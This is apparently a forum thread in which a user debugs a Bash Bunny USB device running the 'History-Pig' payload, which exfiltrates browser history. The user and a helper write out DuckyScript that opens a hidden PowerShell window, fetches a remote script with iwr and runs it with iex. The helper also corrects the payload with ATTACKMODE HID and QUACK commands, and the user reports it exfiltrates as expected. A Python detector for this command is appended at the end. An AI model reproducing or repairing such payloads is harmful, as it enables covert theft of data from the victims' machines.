Bash Bunny no longer firing scripts on switch1 or switch2


baud
Solved by dark_pyrro

Hello all,

I purchased a Bash Bunny a couple months ago and I just recently tried using it yesterday. It was working for the majority of the day and then suddenly the scripts just stopped firing on switch1 or switch2. I'm able to put it into arming mode just fine, and I know the scripts themselves work because they're directly from the github repo and they were working previously. When I plug in the Bash Bunny, the light turns green, then turns off and nothing happens. I've performed a factory reset, the problem still persists. Please help.

File structure with no SD Card:

kp7pJdc.png

File structure with SD Card:

xGcOFy8.png

Link to comment
Share on other sites

16 minutes ago, baud said:

then suddenly the scripts just stopped firing on switch1 or switch2

Is the "suddenly" moment linked to you starting to use a Micro SD card with the Bunny?

Judging from the screenshots, it seems as if you have tried to "duplicate" the file system structure of the internal storage to the Micro SD card. That won't work though since you always have to execute payloads stored on the internal udisk, not from the Micro SD card. They will simply not run at all.

Link to comment
Share on other sites

1 minute ago, dark_pyrro said:

Is the "suddenly" moment linked to you starting to use a Micro SD card with the Bunny?

Judging from the screenshots, it seems as if you have tried to "duplicate" the file system structure of the internal storage to the Micro SD card. That won't work though since you always have to execute payloads stored on the internal udisk, not from the Micro SD card. They will simply not run at all.

Interesting, so you don't put anything on the SD card at all? Everything should be stored directly on the bunny?

Link to comment
Share on other sites

Just now, dark_pyrro said:

What payloads are you using in each switch position?

Currently the only one I'm using is History-Pig. If I copy/paste the powershell string into run it executes as expected, the bash bunny just never sends any keystrokes.

REM     Title: History-Pig

REM     Author: atomiczsec

REM     Description: This payload is meant to exfiltrate browsers history to a dropbox

REM     Target: Windows 10, 11

DELAY 2000
GUI r
DELAY 500
STRING powershell -w h -NoP -NonI -ep Bypass $pl = iwr 'https://redacted.site/pl.ps1'; iex $pl
ENTER

REM     Remember to replace the link with your DropBox shared link for the intended file to download
REM     Also remember to replace ?dl=0 with ?dl=1 at the end of your link so it is executed properlymode con:cols=14 lines=1

Link to comment
Share on other sites

12 minutes ago, dark_pyrro said:

Where's the ATTACKMODE?

I am not sure, I am very new to duckyscript. I got this directly from github and it was executing as is before which is odd to me if it's missing something. What do I need to add? ATTACKMODE something something?

Link to comment
Share on other sites

3 minutes ago, baud said:

I am not sure, I am very new to duckyscript. I got this directly from github and it was executing as is before which is odd to me if it's missing something. What do I need to add? ATTACKMODE something something?

I see, it looks like I'd need to add ATTACKMODE HID, I'll give that a shot.

Link to comment
Share on other sites

It seems as if the author of the payload has forgotten to add that for some reason. Not sure why. You need to tell the Bunny what mode it should "act in". If you don't tell it to act as a keyboard (HID), it won't type anything. So... add

ATTACKMODE HID

to the top of the payload file

To my knowledge, it's only the 2nd gen Ducky that defaults to ATTACKMODE HID if nothing is specified. Never heard/seen that it's valid for the Bunny.

However, I guess you will have a bit of a challenge to get that running anyway since Dropbox has changed the way shared storage links are working and I don't think this payload has been adjusted to that fact.

Link to comment
Share on other sites

5 minutes ago, dark_pyrro said:

It seems as if the author of the payload has forgotten to add that for some reason. Not sure why. You need to tell the Bunny what mode it should "act in". If you don't tell it to act as a keyboard (HID), it won't type anything. So... add

ATTACKMODE HID

to the top of the payload file

To my knowledge, it's only the 2nd gen Ducky that defaults to ATTACKMODE HID if nothing is specified. Never heard/seen that it's valid for the Bunny.

However, I guess you will have a bit of a challenge to get that running anyway since Dropbox has changed the way shared storage links are working and I don't think this payload has been adjusted to that fact.

Thanks, I added the following to the top, and it's at least changing to a red LED now but I still get no output. I suspect the issue lies with the script itself, I'll play around with it for a while. In regards to the dropbox piece, that all works fine. If I copy/paste the powershell string from the payload and manually run it in a run window, it downloads, executes and exfils as expected. Thanks again for your help, I'll report back if anything changes.

LED R
ATTACKMODE HID
Link to comment
Share on other sites

Something like this

ATTACKMODE HID

QUACK DELAY 3000
QUACK GUI r
QUACK DELAY 500
QUACK STRING powershell -w h -NoP -NonI -ep Bypass $pl = iwr 'https://redacted.site/pl.ps1'; iex $pl
QUACK ENTER

Perhaps also wrap the powershell line in quote marks and escape the dollar char as well

QUACK STRING "powershell -w h -NoP -NonI -ep Bypass \$pl = iwr 'https://redacted.site/pl.ps1'; iex \$pl"

Link to comment
Share on other sites

6 minutes ago, dark_pyrro said:

Yes, you need to QUACK things. The author is a competent user, so I'm not sure why it has been forgotten. Perhaps too quickly "converting" it from the USB Rubber Ducky to the Bunny.

You are the man, thanks so much. This gives me a much better understanding overall on how to use it.

Link to comment
Share on other sites
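
The PowerShell line this payload types into the Run dialog is also what shows up in process-creation logs on the target. As an added example (not part of the thread or of the payload's repository), the Python below normalises PowerShell's abbreviated switches and flags a hidden-window download-and-execute command whose parent is explorer.exe. The abbreviation table, trait names and sample events are assumptions constructed for illustration.

```python
import re

# Full parameter name -> shortest abbreviation accepted (assumed from
# PowerShell's prefix matching of its own switches).
MIN_PREFIX = {"windowstyle": "w", "noprofile": "nop",
              "noninteractive": "noni", "executionpolicy": "ex"}

def canonical(switch):
    """Map '-w', '-NoP', '-ep' ... to the full parameter name, else None."""
    key = switch.lstrip("-/").lower()
    key = "ex" if key == "ep" else key  # "ep" is a fixed alias, not a prefix
    for full, shortest in MIN_PREFIX.items():
        if full.startswith(key) and len(key) >= len(shortest):
            return full

def score(cmdline):
    """Return the set of suspicious traits found in one command line."""
    tokens = cmdline.split()
    exe = tokens[0].strip('"') if tokens else ""
    if not re.search(r"(^|\\)(powershell|pwsh)(\.exe)?$", exe, re.I):
        return set()
    traits, i = set(), 1
    while i < len(tokens) and tokens[i][0] in "-/":  # leading switches only
        name = canonical(tokens[i])
        has_value = name in ("windowstyle", "executionpolicy") and i + 1 < len(tokens)
        value = tokens[i + 1].lower() if has_value else ""
        if name == "windowstyle" and value and "hidden".startswith(value):
            traits.add("hidden-window")
        elif name == "executionpolicy" and value in ("bypass", "unrestricted"):
            traits.add("policy-bypass")
        elif name in ("noprofile", "noninteractive"):
            traits.add(name)
        i += 2 if has_value else 1
    body = cmdline.lower()
    fetch = re.search(r"\b(iwr|invoke-webrequest|irm|invoke-restmethod)\b", body)
    if fetch and re.search(r"\b(iex|invoke-expression)\b", body):
        traits.add("download-and-execute")
    return traits

def is_alert(event):
    """Hidden download-and-execute PowerShell started from explorer.exe."""
    from_shell = event["ParentImage"].lower().endswith("\\explorer.exe")
    return from_shell and {"hidden-window", "download-and-execute"} <= score(event["CommandLine"])

# Constructed events; field names follow Sysmon Event ID 1 (process creation).
PAGE_CMD = "powershell -w h -NoP -NonI -ep Bypass $pl = iwr 'https://redacted.site/pl.ps1'; iex $pl"
EVENTS = [{"ParentImage": r"C:\Windows\explorer.exe", "CommandLine": PAGE_CMD},
          {"ParentImage": r"C:\Windows\System32\svchost.exe",
           "CommandLine": r"powershell.exe -NoProfile -File C:\Scripts\backup.ps1"}]
print([is_alert(e) for e in EVENTS])
```

Commands entered through the Run dialog are also recorded per user under the RunMRU registry key, which gives a second place to look when process-creation logging is not enabled.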
